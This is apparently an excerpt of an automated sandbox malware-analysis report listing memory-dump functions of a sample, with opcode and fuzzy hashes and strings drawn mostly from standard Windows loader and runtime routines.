                                                                                                                                                                                                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                                                                                                  • API String ID: 0-1388552009
                                                                                                                                                                                                                                  • Opcode ID: 8ca9feceef380b8277de66694f9998cddb98bd4156a5e23791b7ff2c4196dc7b
                                                                                                                                                                                                                                  • Instruction ID: d7defc128f25f8ab74c3db5e3f22cb33193abd9b34531611bd1f5a3d0999288a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ca9feceef380b8277de66694f9998cddb98bd4156a5e23791b7ff2c4196dc7b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 606114B5C00219EBDF21DFD5D889ADEBFB8FB08715F54402AE905AB210D7749A45CFA0
                                                                                                                                                                                                                                  Function 014A0485 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • kLsE, xrefs: 014A05FE
                                                                                                                                                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014A0586
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                                  • API String ID: 0-2547482624
                                                                                                                                                                                                                                  • Opcode ID: b5a8a74f943c43ce90fb51e93018a1581c93f1fe6885e6016952ed7f2be7745e
                                                                                                                                                                                                                                  • Instruction ID: 7275055245585c8121d921e09d0ec2b7d7e94662052c59c71be9e131d74f7c0e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5a8a74f943c43ce90fb51e93018a1581c93f1fe6885e6016952ed7f2be7745e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E351CD71A00746DFDB24DFA9C440AEBB7F4AF64304F52843FE69A97261E7309505CBA2
                                                                                                                                                                                                                                  Function 014AA1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 014AA21B
                                                                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 014AA229
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                                                  • API String ID: 0-2876891731
                                                                                                                                                                                                                                  • Opcode ID: dc40183937b576421170896559799ffff966d8c933e29250f73676950b8b1e72
                                                                                                                                                                                                                                  • Instruction ID: 4c4baa5196354c06a6da071be5511375af3ebeae2e8ef03ba76bfee32b920b34
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc40183937b576421170896559799ffff966d8c933e29250f73676950b8b1e72
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9941EF32600615CBEB12CF9AC444BAABBB4FF65740F2544AAE900DF3A1E335D941CB11
                                                                                                                                                                                                                                  Function 0153314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                                                                  • API String ID: 0-118005554
                                                                                                                                                                                                                                  • Opcode ID: 7257ea8f7c2e3e7f3cb5df2f3b9ac014db6f9ad9f20a36bb5c808955015afb41
                                                                                                                                                                                                                                  • Instruction ID: 18cfc495b64e20f1934763c89a5abad3e1d4320a47abc4bd2e3e1fd4d68492ec
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7257ea8f7c2e3e7f3cb5df2f3b9ac014db6f9ad9f20a36bb5c808955015afb41
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B631AD322087429BE355DB6AD884B2ABBE4FFD5714F08086AF954CF390EB71D905CB52
                                                                                                                                                                                                                                  Function 014D31BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: .Local\$@
                                                                                                                                                                                                                                  • API String ID: 0-380025441
                                                                                                                                                                                                                                  • Opcode ID: 31719d89786fc5b671b8fad5b3d625b6ad46ba90a5d4694b6c94524474a18118
                                                                                                                                                                                                                                  • Instruction ID: 9c09dca177a83d4c249753d12535bba4bcf812c3a6b6e480d574580a75eaf89e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31719d89786fc5b671b8fad5b3d625b6ad46ba90a5d4694b6c94524474a18118
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B131B3B2908301AFDB21DF29C894A5BBBE8FB95654F04092FF99583260D634DD05CBD3
                                                                                                                                                                                                                                  Function 014D33D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 0151289A
                                                                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 0151289F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                                                                                                  • API String ID: 0-2653619699
                                                                                                                                                                                                                                  • Opcode ID: e7c19fbe89981a99638dcf9ee37bc59666bbe16ec67547354b1890613c156f4e
                                                                                                                                                                                                                                  • Instruction ID: c87bf09edea3ea95b42b9da4bbf98355583e0d80855cd0b493e5b465f7ef37a0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7c19fbe89981a99638dcf9ee37bc59666bbe16ec67547354b1890613c156f4e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5110A72B00215BBFB269E498D51F5F7AE9EB94B10F24803EBE049F254D674CD0142A1
                                                                                                                                                                                                                                  Function 014DA4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                                                                                                                                                  • Opcode ID: 11ac572bfdead0ba78a39073b6aa0775955c7f8b96b82ef84bd8b77e77bb4e83
                                                                                                                                                                                                                                  • Instruction ID: 7ca9230265cca00028368c53e8583c1d5c37a74f1e715b81cb81bdc6a2c0a9a8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11ac572bfdead0ba78a39073b6aa0775955c7f8b96b82ef84bd8b77e77bb4e83
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8401F4B2150700AFD311DF24CD15F2277E8EB50B15F19893EE658CB5A0E774D904CB46
                                                                                                                                                                                                                                  Function 015260A0 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                                                                  • Opcode ID: 43ce119d023515afb8d10d6df0935fa0792543d6271538834ffaa13e83de96f7
                                                                                                                                                                                                                                  • Instruction ID: 9a2c6299e4cea8aee5a66e3db502e2d08c20ce71d59db591c5e166a0e04d79f6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43ce119d023515afb8d10d6df0935fa0792543d6271538834ffaa13e83de96f7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D915472A00215AFDB21DF99CD85FAEBBB8FF19B10F10445AF600AB1D1D775A900CBA4
                                                                                                                                                                                                                                  Function 014DA580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: GlobalTags
                                                                                                                                                                                                                                  • API String ID: 0-1106856819
                                                                                                                                                                                                                                  • Opcode ID: fffadaa250cc6d513554f9436424e12f7e960eca90fdb81ddafc25f39e698b0f
                                                                                                                                                                                                                                  • Instruction ID: 32f3e7b065165d700ea25eaf4e892cd214ffca94e1a60dedd31456f9299ef983
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fffadaa250cc6d513554f9436424e12f7e960eca90fdb81ddafc25f39e698b0f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28719D75E0021ADFEF25CF9CC4906ADBBB2BF58710F54852EE505AB248E7B48941CB50
                                                                                                                                                                                                                                  Function 014B02F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: #%u
                                                                                                                                                                                                                                  • API String ID: 0-232158463
                                                                                                                                                                                                                                  • Opcode ID: 24d9fbc76fd97536d5e1e8c2d73cc29d857fa08b702c90bc1863f38ef12bc737
                                                                                                                                                                                                                                  • Instruction ID: 8f15588bb8a2aea0ae2857f62d2a6316e5a3ec3360b6374c8cfe6a13c9afbc67
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24d9fbc76fd97536d5e1e8c2d73cc29d857fa08b702c90bc1863f38ef12bc737
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3715E71A0010A9FDB06DF99C994FAEB7F8FF58704F14406AE905EB261EB34E945CB60
                                                                                                                                                                                                                                  Function 0152F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                                  • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                                                                                                                  • Instruction ID: ee3991b98c6d17b9b1ef2e827c2a9cd5cad09c4138eeb3b49961309f68dabab4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16519D72604316AFE7219F19D844F6BB7F8FB95714F00092EF6409B2A0D7B5E904CBA1
                                                                                                                                                                                                                                  Function 014BE547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: EXT-
                                                                                                                                                                                                                                  • API String ID: 0-1948896318
                                                                                                                                                                                                                                  • Opcode ID: 75b47d391e5a83202d71b956e7483bd2f377ffdf41ed293bed9e06f0298cfb8e
                                                                                                                                                                                                                                  • Instruction ID: 63ece50363af5cda75f2309444d1d52a8b9f97bd00c6f2ed4819b734ab578dee
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75b47d391e5a83202d71b956e7483bd2f377ffdf41ed293bed9e06f0298cfb8e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E541B3715183029BD710DE76C884BEBB7D8AFD8714F440A2FF688E72A0E674D90587B6
                                                                                                                                                                                                                                  Function 014D41BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                                  • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                                                                                                                  • Instruction ID: 1e0b273988882a79ee1228593d68286b48bbd45a0c2ffc9ae0d2346be87c8052
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F551AE711047119FD321CF1AC840A6BBBF8FF58710F008A2EFA95976A0E7B4E904CBA1
                                                                                                                                                                                                                                  Function 0151C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: BinaryHash
                                                                                                                                                                                                                                  • API String ID: 0-2202222882
                                                                                                                                                                                                                                  • Opcode ID: cc83edc6aeb0345f21d93dbf8c2b9c40ae681d8f12be836d868394593cb41a58
                                                                                                                                                                                                                                  • Instruction ID: 08a9b86ae22c0072d59bdc66431394b349ada4961ec639a1a779bc8d5c6eee9a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc83edc6aeb0345f21d93dbf8c2b9c40ae681d8f12be836d868394593cb41a58
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 494157B1D4012DABEF21DA50CC84FDEB77CAB54714F0045E6E708AB155DB719E888FA4
                                                                                                                                                                                                                                  Function 01529429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: verifier.dll
                                                                                                                                                                                                                                  • API String ID: 0-3265496382
                                                                                                                                                                                                                                  • Opcode ID: d07394e0dd8dea1b9ca8d69f72d61a85173328d4af11e782cd4721ccd15dc4cb
                                                                                                                                                                                                                                  • Instruction ID: e0e5021eea9a3358f36b6f50adddfaf6c14813bf752c37c2693ebc65c86da678
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d07394e0dd8dea1b9ca8d69f72d61a85173328d4af11e782cd4721ccd15dc4cb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E31D6727102229FEB368F2D9850B3A77E5FB99718F55846AE608DF3C1F6318D818790
                                                                                                                                                                                                                                  Function 014D7425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                  • API String ID: 0-1885708031
                                                                                                                                                                                                                                  • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                                                                                                                                  • Instruction ID: 0e0363568f1535fce4ef7a7b8bf83c61de55cde453b953b0cf67cda376dea336
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE41B275A00516EBDF22DF88C4A0FBEBBB4FF5070AF00446BE9459B261D7749942C791
                                                                                                                                                                                                                                  Function 015285AA Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 015285DE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                                                                  • API String ID: 0-702105204
                                                                                                                                                                                                                                  • Opcode ID: a955b212b5b145d0d6d57b3f7cad0520dd67c53e8567c0c4517fc88c369acb34
                                                                                                                                                                                                                                  • Instruction ID: 846e082f43415e92bf8435cf05fa64e2a12965270ecb123266c9a3bbd8aad11e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a955b212b5b145d0d6d57b3f7cad0520dd67c53e8567c0c4517fc88c369acb34
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 710147332002215BDF366F969844A6A3FE5FF72614F05045EE2011E5E6CB207854CB95
                                                                                                                                                                                                                                  Function 014F717A Relevance: .7, Instructions: 705COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a9c4682b52efd5fd3c753ad28fceffe192dbac5fab7d162f8bc94c992ebbdab1
                                                                                                                                                                                                                                  • Instruction ID: cc7b14fcc013514a4c07e43c474eabd44fbe0a8017ee8053eb6547038fe4beb4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9c4682b52efd5fd3c753ad28fceffe192dbac5fab7d162f8bc94c992ebbdab1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C342C371A006169FDB15CF5DC480ABEBBF2FF88315B14856ED652AB361D738E842CB90
                                                                                                                                                                                                                                  Function 014CB1E0 Relevance: .6, Instructions: 629COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c585543485775295caef695f79315e21337f27162c592c1df35d46fee2c4f8ff
                                                                                                                                                                                                                                  • Instruction ID: 328032125047bfe13e83ef2550063a961182f4d59a99c3a6d5089995634c4db8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c585543485775295caef695f79315e21337f27162c592c1df35d46fee2c4f8ff
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E232B279E00219DBCF14DF99D885BAEBBB1FF54B44F19006EE805AB3A0D7359901CB91
                                                                                                                                                                                                                                  Function 014B2760 Relevance: .6, Instructions: 605COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ea35c1ccdc026b90b895ccbdb994166c4d5ceced634449cf72107727013eeb17
                                                                                                                                                                                                                                  • Instruction ID: f1fd5f93f21ecd6047be252332a0497fc144e0733852a0759c27791a55976f54
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea35c1ccdc026b90b895ccbdb994166c4d5ceced634449cf72107727013eeb17
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C232E070A007568FDB26CFA9C894BBEBBF2BF84704F24451EE5469F284D735A852CB50
                                                                                                                                                                                                                                  Function 0156124C Relevance: .6, Instructions: 571COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ddc890845abd833a2b31d02e10e76b091f8a7e8bed9a2dd1d3b9aa3a7e80e01f
                                                                                                                                                                                                                                  • Instruction ID: 2b2300567ef821a55ba81b0099c59de305ecd98f71dcbc762b64cbea872efdeb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddc890845abd833a2b31d02e10e76b091f8a7e8bed9a2dd1d3b9aa3a7e80e01f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A322AD35A006168FDB19CF69C4D0ABEB7BABF88305B18856DD952DF345DB30A942CBD0
                                                                                                                                                                                                                                  Function 015384BB Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: af48e83c612dc76d7fa00c5e2203a6316ed1afa7ac9da195ce9364ed1f5b1a86
                                                                                                                                                                                                                                  • Instruction ID: a3183562cd40c582e8e81fb7e2195571db15ba6009c7506c13be2e5a5c52fcde
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af48e83c612dc76d7fa00c5e2203a6316ed1afa7ac9da195ce9364ed1f5b1a86
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21D1D471E0060A9BDF1ACF69C841AFEB7F2BFC4304F188669E855EB241D735E9058B60
                                                                                                                                                                                                                                  Function 014A64F0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
